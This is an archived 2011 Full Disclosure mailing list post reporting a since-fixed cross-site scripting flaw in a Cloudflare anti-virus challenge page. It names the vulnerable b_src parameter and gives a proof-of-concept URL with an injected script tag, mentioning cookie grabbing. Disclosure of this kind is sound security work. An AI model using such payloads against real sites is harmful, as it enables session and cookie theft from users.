Full Disclosure mailing list archives
http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability
From: sandeep k <sandeepk.l337 () gmail com>
Date: Mon, 17 Oct 2011 13:00:16 +0530
0×1 Site : *http://anti-virus.cloudflare.com* 0×3 Author : *Sandeep Kamble* 0×4 Reported : October 12, 2011 0×6 Public Release : October 17 2011 0×7 Status: Fixed *Description : * *Anti-virus.cloudflare.com* is a service for avoiding spams . This project to stop attacks and educate visitors with infected computers about how they can clean up their machines. *Affected Variable :* * ?b_src=* *Exploit :* Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS) Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies . POC : http://anti-virus.cloudflare.com/cdn-cgi/anti-virus-challenge?h=7777772e6578706c6f69742d64622e636f6d2c6578706c6f69742d64622e636f6d&x=f1cd78c0ef2c1d7505afe19491fa0477 &b_src=<script>alert(’Document.cookie’)</script> Sandeep Kamble www.sandeepkamble.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability sandeep k (Oct 17)